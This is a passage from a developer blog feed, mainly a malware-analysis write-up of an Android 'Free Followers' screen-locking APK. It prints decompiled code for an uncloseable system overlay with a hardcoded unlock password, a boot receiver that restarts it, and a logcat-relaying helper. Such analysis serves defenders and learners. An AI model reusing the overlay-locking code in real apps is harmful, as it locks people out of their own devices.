class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> ctfwriteups reversing java ctf Malware - Free Followers R Srikesh Mon, 05 Jun 2023 12:05:24 +0000 https://dev.to/komi/malware-free-followers-18ae https://dev.to/komi/malware-free-followers-18ae <p>I found this malware sample from <strong>malwareBazaar</strong>.</p> <p><strong>SHA-256</strong> Hash: 5251a356421340a45c8dc6d431ef8a8cbca4078a0305a87f4fbd552e9fc0793e</p> <p>When we open the application we are greeted with a window that looks like</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--0kj561-p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/az2ke3zn2mq2necqgofh.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--0kj561-p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/az2ke3zn2mq2necqgofh.png" alt="Malware Window" width="533" height="321"></a></p> <p>Note: We cant close this window</p> <p>Lets dive into APK Analysis with inspecting <strong>Android Manifest.xml</strong></p> <p>There are 2 suspicious permissions to keep in mind</p> <ol> <li> <p><code>android.permission.SYSTEM_ALERT_WINDOW</code></p> <p>This permission allows an app to create windows </p> </li> <li> <p><code>android.permission.WAKE_LOCK</code></p> <p>allows your app to keep the device awake, even when the device is in sleep mode</p> </li> </ol> <p>Lets dive into Main Activity</p> <p>Two important things to notice is<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">ADRTLogCatReader</span><span class="o">.</span><span class="na">onContext</span><span class="o">(</span><span class="k">this</span><span class="o">,</span> <span class="s">"com.aide.ui"</span><span class="o">);</span> <span class="n">startService</span><span class="o">(</span><span class="k">new</span> <span class="nc">Intent</span><span class="o">(</span><span class="k">this</span><span class="o">,</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"com.XPhantom.id.MyService"</span><span class="o">)));</span> </code></pre> </div> <p>If we look into ADRTLogCatReader, we could see a suspicious code<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kd">public</span> <span class="kt">void</span> <span class="nf">run</span><span class="o">()</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">BufferedReader</span> <span class="n">bufferedReader</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">BufferedReader</span><span class="o">(</span><span class="k">new</span> <span class="nc">InputStreamReader</span><span class="o">(</span><span class="nc">Runtime</span><span class="o">.</span><span class="na">getRuntime</span><span class="o">().</span><span class="na">exec</span><span class="o">(</span><span class="s">"logcat -v threadtime"</span><span class="o">).</span><span class="na">getInputStream</span><span class="o">()),</span> <span class="mi">20</span><span class="o">);</span> <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">readLine</span> <span class="o">=</span> <span class="n">bufferedReader</span><span class="o">.</span><span class="na">readLine</span><span class="o">();</span> <span class="k">if</span> <span class="o">(</span><span class="n">readLine</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="nc">ADRTSender</span><span class="o">.</span><span class="na">sendLogcatLines</span><span class="o">(</span><span class="k">new</span> <span class="nc">String</span><span class="o">[]{</span><span class="n">readLine</span><span class="o">});</span> <span class="o">}</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">IOException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>We could a malicious command getting executed during Runtime. The command <code>logcat -v threadtime</code> can give details like date, invocation time, priority, tag, PID, and TID of the thread issuing the message. </p> <p>Now another suspicious code is this line <code>ADRTSender.sendLogcatLines(new String[]{readLine});</code> where the details from our logcat is passed as argument. </p> <p>If we look into sendLogcatLines()<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">sendLogcatLines</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">strArr</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Intent</span> <span class="n">intent</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Intent</span><span class="o">();</span> <span class="n">intent</span><span class="o">.</span><span class="na">setPackage</span><span class="o">(</span><span class="n">debuggerPackageName</span><span class="o">);</span> <span class="n">intent</span><span class="o">.</span><span class="na">setAction</span><span class="o">(</span><span class="s">"com.adrt.LOGCAT_ENTRIES"</span><span class="o">);</span> <span class="n">intent</span><span class="o">.</span><span class="na">putExtra</span><span class="o">(</span><span class="s">"lines"</span><span class="o">,</span> <span class="n">strArr</span><span class="o">);</span> <span class="n">context</span><span class="o">.</span><span class="na">sendBroadcast</span><span class="o">(</span><span class="n">intent</span><span class="o">);</span> <span class="o">}</span> </code></pre> </div> <p>We could see that our logs is sent to an app whose package name was defined in MainActivity (ie <code>com.aide.ui</code>) using intents. </p> <p>Now lets look for the reason why window is there (and why not closable). </p> <p>Since no other code other than invoking the service was called, lets look into the service implementation and yes we get the reason.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kd">public</span> <span class="kt">void</span> <span class="nf">onCreate</span><span class="o">()</span> <span class="o">{</span> <span class="nc">ADRTLogCatReader</span><span class="o">.</span><span class="na">onContext</span><span class="o">(</span><span class="k">this</span><span class="o">,</span> <span class="s">"com.aide.ui"</span><span class="o">);</span> <span class="k">this</span><span class="o">.</span><span class="na">windowManager</span> <span class="o">=</span> <span class="o">(</span><span class="nc">WindowManager</span><span class="o">)</span> <span class="n">getSystemService</span><span class="o">(</span><span class="s">"window"</span><span class="o">);</span> <span class="k">this</span><span class="o">.</span><span class="na">myView</span> <span class="o">=</span> <span class="o">(</span><span class="nc">ViewGroup</span><span class="o">)</span> <span class="o">((</span><span class="nc">LayoutInflater</span><span class="o">)</span> <span class="n">getSystemService</span><span class="o">(</span><span class="s">"layout_inflater"</span><span class="o">)).</span><span class="na">inflate</span><span class="o">(</span><span class="no">C0000R</span><span class="o">.</span><span class="na">layout</span><span class="o">.</span><span class="na">main</span><span class="o">,</span> <span class="o">(</span><span class="nc">ViewGroup</span><span class="o">)</span> <span class="kc">null</span><span class="o">);</span> <span class="k">this</span><span class="o">.</span><span class="na">chatHead</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">ImageView</span><span class="o">(</span><span class="k">this</span><span class="o">);</span> <span class="k">this</span><span class="o">.</span><span class="na">chatHead</span><span class="o">.</span><span class="na">setImageResource</span><span class="o">(</span><span class="no">C0000R</span><span class="o">.</span><span class="na">drawable</span><span class="o">.</span><span class="na">ic_launcher</span><span class="o">);</span> <span class="k">this</span><span class="o">.</span><span class="na">f0e1</span> <span class="o">=</span> <span class="o">(</span><span class="nc">EditText</span><span class="o">)</span> <span class="k">this</span><span class="o">.</span><span class="na">myView</span><span class="o">.</span><span class="na">findViewById</span><span class="o">(</span><span class="no">C0000R</span><span class="o">.</span><span class="na">C0001id</span><span class="o">.</span><span class="na">mainEditText1</span><span class="o">);</span> <span class="o">((</span><span class="nc">Button</span><span class="o">)</span> <span class="k">this</span><span class="o">.</span><span class="na">myView</span><span class="o">.</span><span class="na">findViewById</span><span class="o">(</span><span class="no">C0000R</span><span class="o">.</span><span class="na">C0001id</span><span class="o">.</span><span class="na">mainButton1</span><span class="o">)).</span><span class="na">setOnClickListener</span><span class="o">(</span><span class="k">new</span> <span class="nc">View</span><span class="o">.</span><span class="na">OnClickListener</span><span class="o">(</span><span class="k">this</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// from class: com.XPhantom.id.MyService.100000000</span> <span class="cm">/* renamed from: this$0 */</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">MyService</span> <span class="n">thiss</span><span class="o">;</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">thiss</span> <span class="o">=</span> <span class="k">this</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@Override</span> <span class="c1">// android.view.View.OnClickListener</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">onClick</span><span class="o">(</span><span class="nc">View</span> <span class="n">view</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">thiss</span><span class="o">.</span><span class="na">f0e1</span><span class="o">.</span><span class="na">getText</span><span class="o">().</span><span class="na">toString</span><span class="o">().</span><span class="na">equals</span><span class="o">(</span><span class="s">"Abdullah@"</span><span class="o">))</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">thiss</span><span class="o">.</span><span class="na">windowManager</span><span class="o">.</span><span class="na">removeView</span><span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">thiss</span><span class="o">.</span><span class="na">myView</span><span class="o">);</span> <span class="k">try</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">thiss</span><span class="o">.</span><span class="na">context</span><span class="o">.</span><span class="na">startService</span><span class="o">(</span><span class="k">new</span> <span class="nc">Intent</span><span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">thiss</span><span class="o">.</span><span class="na">context</span><span class="o">,</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"com.XPhantom.id.MyService"</span><span class="o">)));</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">ClassNotFoundException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">NoClassDefFoundError</span><span class="o">(</span><span class="n">e</span><span class="o">.</span><span class="na">getMessage</span><span class="o">());</span> <span class="o">}</span> <span class="o">}</span> <span class="k">this</span><span class="o">.</span><span class="na">thiss</span><span class="o">.</span><span class="na">f0e1</span><span class="o">.</span><span class="na">setText</span><span class="o">(</span><span class="s">""</span><span class="o">);</span> <span class="o">}</span> <span class="o">});</span> <span class="nc">WindowManager</span><span class="o">.</span><span class="na">LayoutParams</span> <span class="n">layoutParams</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">WindowManager</span><span class="o">.</span><span class="na">LayoutParams</span><span class="o">(-</span><span class="mi">2</span><span class="o">,</span> <span class="o">-</span><span class="mi">2</span><span class="o">,</span> <span class="mi">2002</span><span class="o">,</span> <span class="mi">1</span><span class="o">,</span> <span class="o">-</span><span class="mi">3</span><span class="o">);</span> <span class="n">layoutParams</span><span class="o">.</span><span class="na">gravity</span> <span class="o">=</span> <span class="mi">17</span><span class="o">;</span> <span class="n">layoutParams</span><span class="o">.</span><span class="na">x</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="n">layoutParams</span><span class="o">.</span><span class="na">y</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="k">new</span> <span class="nf">View</span><span class="o">(</span><span class="k">this</span><span class="o">).</span><span class="na">setBackgroundColor</span><span class="o">(</span><span class="mi">872349696</span><span class="o">);</span> <span class="k">this</span><span class="o">.</span><span class="na">windowManager</span><span class="o">.</span><span class="na">addView</span><span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">myView</span><span class="o">,</span> <span class="n">layoutParams</span><span class="o">);</span> <span class="o">}</span> </code></pre> </div> <p>We could understand that this window is programmed not to close for any input provided in the Editbox. </p> <p>Another important thing to note is that this window open even if we didnt open the app and it opens when we turn on our phone after power-off and the reason for this is a BroadcastReceiver that calls the service for the intent <code>android.intent.action.BOOT_COMPLETED</code> .</p> <p><strong>Ending Note</strong></p> <p>This was a fun malware to look into and I would recommend those who are getting started in Android Reversing / Malware Analysis to started with this sample.</p> security malware androidsecurity java